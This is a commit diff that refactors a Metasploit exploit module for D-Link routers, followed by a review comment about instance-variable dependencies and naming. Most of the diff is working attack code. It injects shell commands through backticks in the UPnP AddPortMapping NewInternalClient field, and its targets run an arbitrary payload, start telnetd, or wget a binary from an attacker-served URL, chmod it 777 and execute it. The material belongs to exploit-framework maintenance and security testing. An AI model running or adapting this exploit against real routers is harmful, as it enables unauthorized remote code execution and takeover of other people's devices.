Use instance variables
parent
e93eef4534
commit
4beea52449
|
@ -85,51 +85,51 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
new_portmapping_description = rand_text_alpha(8)
|
@new_portmapping_descr = rand_text_alpha(8)
|
||||||
new_external_port = rand(65535)
|
@new_external_port = rand(65535)
|
||||||
new_internal_port = rand(65535)
|
@new_internal_port = rand(65535)
|
||||||
|
|
||||||
if target.name =~ /CMD/
|
if target.name =~ /CMD/
|
||||||
exploit_cmd(new_external_port, new_internal_port, new_portmapping_description)
|
exploit_cmd
|
||||||
elsif target.name =~ /Telnet/
|
elsif target.name =~ /Telnet/
|
||||||
exploit_telnet(new_external_port, new_internal_port, new_portmapping_description)
|
exploit_telnet
|
||||||
else
|
else
|
||||||
exploit_mips(new_external_port, new_internal_port, new_portmapping_description)
|
exploit_mips
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit_cmd(new_external_port, new_internal_port, new_portmapping_description)
|
def exploit_cmd
|
||||||
if not (datastore['CMD'])
|
if not (datastore['CMD'])
|
||||||
fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
|
fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
|
||||||
end
|
end
|
||||||
cmd = payload.encoded
|
cmd = payload.encoded
|
||||||
type = "add"
|
type = "add"
|
||||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
res = request(cmd, type)
|
||||||
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
||||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||||
end
|
end
|
||||||
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
|
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
|
||||||
type = "delete"
|
type = "delete"
|
||||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
res = request(cmd, type)
|
||||||
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
||||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||||
end
|
end
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit_telnet(new_external_port, new_internal_port, new_portmapping_description)
|
def exploit_telnet
|
||||||
telnetport = rand(65535)
|
telnetport = rand(65535)
|
||||||
|
|
||||||
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
|
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
|
||||||
|
|
||||||
cmd = "telnetd -p #{telnetport}"
|
cmd = "telnetd -p #{telnetport}"
|
||||||
type = "add"
|
type = "add"
|
||||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
res = request(cmd, type)
|
||||||
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
||||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||||
end
|
end
|
||||||
type = "delete"
|
type = "delete"
|
||||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
res = request(cmd, type)
|
||||||
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
||||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||||
end
|
end
|
||||||
|
@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit_mips(new_external_port, new_internal_port, new_portmapping_description)
|
def exploit_mips
|
||||||
|
|
||||||
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
|
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
|
||||||
|
|
||||||
|
@ -220,7 +220,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
cmd = "/usr/bin/wget #{service_url} -O /tmp/#(unknown); chmod 777 /tmp/#(unknown); /tmp/#(unknown)"
|
cmd = "/usr/bin/wget #{service_url} -O /tmp/#(unknown); chmod 777 /tmp/#(unknown); /tmp/#(unknown)"
|
||||||
type = "add"
|
type = "add"
|
||||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
res = request(cmd, type)
|
||||||
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
||||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
|
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
|
||||||
end
|
end
|
||||||
|
@ -236,13 +236,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
register_file_for_cleanup("/tmp/#(unknown)")
|
register_file_for_cleanup("/tmp/#(unknown)")
|
||||||
|
|
||||||
type = "delete"
|
type = "delete"
|
||||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
res = request(cmd, type)
|
||||||
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
||||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
def request(cmd, type)
|
||||||
|
|
||||||
uri = '/soap.cgi'
|
uri = '/soap.cgi'
|
||||||
|
|
||||||
|
@ -256,14 +256,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
|
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
|
||||||
|
|
||||||
data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
|
data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
|
||||||
data_cmd << "<NewPortMappingDescription>#{new_portmapping_description}</NewPortMappingDescription>"
|
data_cmd << "<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
|
||||||
data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
|
data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
|
||||||
data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
|
data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
|
||||||
data_cmd << "<NewEnabled>1</NewEnabled>"
|
data_cmd << "<NewEnabled>1</NewEnabled>"
|
||||||
data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
|
data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>"
|
||||||
data_cmd << "<NewRemoteHost></NewRemoteHost>"
|
data_cmd << "<NewRemoteHost></NewRemoteHost>"
|
||||||
data_cmd << "<NewProtocol>TCP</NewProtocol>"
|
data_cmd << "<NewProtocol>TCP</NewProtocol>"
|
||||||
data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
|
data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
|
||||||
data_cmd << "</m:AddPortMapping>"
|
data_cmd << "</m:AddPortMapping>"
|
||||||
else
|
else
|
||||||
#we should clean it up ... otherwise we are not able to exploit it multiple times
|
#we should clean it up ... otherwise we are not able to exploit it multiple times
|
||||||
|
@ -271,7 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
|
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
|
||||||
|
|
||||||
data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
|
data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
|
||||||
data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
|
data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
|
||||||
data_cmd << "</m:DeletePortMapping>"
|
data_cmd << "</m:DeletePortMapping>"
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
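Review bot: `request(cmd, type)` now reads `@new_external_port`, `@new_internal_port` and `@new_portmapping_descr`, which only `exploit` assigns, so any path that reaches `request` without going through `exploit` first (a future `check`, or the per-target helpers called directly) would interpolate `nil` and send empty `<NewExternalPort>`/`<NewInternalPort>` elements; that dependency is invisible at the three call sites `res = request(cmd, type)` in exploit_cmd, exploit_telnet and exploit_mips. A one-line comment above `def request(cmd, type)` would make it explicit, e.g. `# Relies on @new_external_port, @new_internal_port and @new_portmapping_descr, set by #exploit before it dispatches to the per-target helpers`. As a point of style, `@new_portmapping_descr` is abbreviated while its two siblings and the `NewPortMappingDescription` element it fills are spelled out; `@new_portmapping_description` would keep the naming consistent. The `request` method begins in the `@@ -236` hunk and its body continues past the last hunk shown.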